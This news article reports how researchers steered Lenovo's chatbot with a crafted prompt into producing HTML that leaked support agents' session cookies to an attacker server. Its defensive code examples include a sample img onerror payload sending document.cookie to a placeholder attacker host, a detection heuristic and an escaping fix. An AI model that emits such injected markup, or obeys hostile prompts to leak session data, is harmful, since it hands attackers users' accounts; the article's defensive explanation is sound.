- Researchers found a way to deceive Lenovo’s AI chatbot
- Lena shared active session cookies with researchers
- Malicious prompts could be used for a wide variety of attacks
Lena, the ChatGPT-powered chatbot on Lenovo’s website, could be turned into a malicious insider, divulging company secrets or executing malicious software, using nothing more than a convincing prompt, experts have warned.
Security researchers at Cybernews succeeded in obtaining active session cookies belonging to human customer support agents, effectively allowing them to take over those accounts, access sensitive data, and potentially pivot elsewhere in the corporate network.
“The discovery highlights several security problems: poor sanitization of user input, improper sanitization of chatbot output, the web server not verifying content produced by the chatbot, running unverified code, and loading content from arbitrary web resources,” the researchers said.
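The last two issues the researchers list, running unverified code and loading content from arbitrary web resources, are commonly mitigated on the browser side with a Content-Security-Policy response header that restricts which origins a page may load from or connect to. A generic example of such a header (not Lenovo’s actual configuration):

```http
Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; connect-src 'self'
```

With a policy like this in place, injected markup that tries to fetch resources from an attacker-controlled origin is blocked by the browser, regardless of how the markup got into the page.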
“Massive safety surveillance”
At the heart of the problem, they said, is the fact that chatbots are “people pleasers”. Without proper guardrails, they will do what they are told, and they are unable to distinguish a benign request from a malicious one.
In this case, the Cybernews researchers wrote a 400-word prompt instructing the chatbot to generate an HTML response.
The response contained hidden instructions to load resources from a server under the attackers’ control, along with instructions to send data obtained from the customer’s browser.
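The researchers did not publish their actual payload, but the pattern they describe can be illustrated with a hypothetical snippet: injected markup that loads a resource from an attacker-controlled server (here the placeholder `attacker.example`) and appends the victim’s session cookie to the request, plus a deliberately naive check that flags such markup:

```python
import re

# Hypothetical example of the kind of HTML a poisoned chatbot response
# might contain: an "image" whose error handler sends the victim's
# session cookie to an attacker-controlled server.
# "attacker.example" is a placeholder, not real infrastructure.
INJECTED_HTML = (
    "<img src=x onerror=\"fetch('https://attacker.example/?c='"
    "+document.cookie)\">"
)

def looks_like_exfiltration(markup: str) -> bool:
    """Very naive heuristic: flag markup that combines access to
    document.cookie with a reference to an external URL."""
    has_cookie_access = "document.cookie" in markup
    has_external_url = re.search(r"https?://", markup) is not None
    return has_cookie_access and has_external_url

print(looks_like_exfiltration(INJECTED_HTML))  # prints True
```

A real defense would not rely on pattern matching like this; the sketch only shows why markup generated by a chatbot must be inspected or neutralized before it reaches a browser.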
They also pointed out that, while their tests resulted in the theft of session cookies, the end result could have been almost anything.
“This is not limited to cookie theft. It may also be possible to execute certain system commands, which could allow the installation of backdoors and lateral movement to other servers and computers on the network,” Cybernews explained.
“We haven’t tried any of this,” they added.
After being informed of the findings, Lenovo told Cybernews that it had “protected its systems”, without detailing exactly what had been done about what the researchers described as a “massive security oversight” with potentially devastating consequences.
The researchers urged all companies using chatbots to assume that all of their output is “potentially malicious” and to act accordingly.
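Following that advice, here is a minimal sketch in Python of the output-side fix, assuming chatbot replies are embedded into web pages: HTML-escape the model’s output before rendering so any injected markup displays as inert text instead of executing. Escaping is standard web practice, not Lenovo’s confirmed remediation.

```python
import html

def render_chatbot_reply(reply: str) -> str:
    """Treat the model's output as untrusted user input: escape it
    before embedding it in a page so injected tags cannot execute."""
    return html.escape(reply)

# A reply carrying a hypothetical injected cookie-stealing tag
# ("attacker.example" is a placeholder, not real infrastructure).
malicious_reply = (
    "<img src=x onerror=\"fetch('https://attacker.example/?c='"
    "+document.cookie)\">"
)

safe = render_chatbot_reply(malicious_reply)
# The injected tag is now inert text: it begins with &lt;img, not <img.
print(safe)
```

Escaping on output is only one layer; the problems Cybernews lists also call for validating user input and restricting what the chatbot’s HTML may load.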